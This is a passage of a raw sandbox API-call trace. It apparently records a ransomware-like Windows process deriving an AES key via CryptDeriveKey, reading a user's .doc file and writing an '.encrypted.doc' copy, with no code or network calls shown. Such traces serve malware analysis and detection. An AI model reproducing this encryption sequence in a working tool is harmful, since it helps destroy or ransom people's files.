wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.857] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.857] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.857] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.857] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0035.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.857] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0035.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.858] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.858] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0035.858] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.858] CryptDestroyHash (hHash=0x7c2240) returned 1 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0035.858] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0035.858] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0035.858] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.858] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.859] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0035.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\oy6qw7y-w3iuu.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.859] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0035.859] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0035.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0035.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0035.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0035.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0035.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.859] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.859] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.859] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0035.860] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0035.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0035.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c95d0 [0035.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0035.861] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66")) returned 0x10 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0035.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0035.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0035.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0035.861] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.encrypted.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\oy6qw7y-w3iuu.encrypted.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0035.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0035.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0035.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.862] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0035.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0035.862] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0035.862] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0035.862] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0035.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0035.863] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0035.863] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x5068, lpOverlapped=0x0) returned 1 [0035.864] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0035.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5068) returned 0x955018 [0035.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0035.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0035.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0035.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5068) returned 0x95a088 [0035.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.866] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.866] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5068) returned 0x955018 [0035.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0035.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0035.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.867] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0035.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0035.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0035.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0035.867] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0035.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0035.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0035.867] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0035.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.867] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x5068) returned 0x955018 [0035.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0035.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0035.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da348 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0035.868] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889430 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 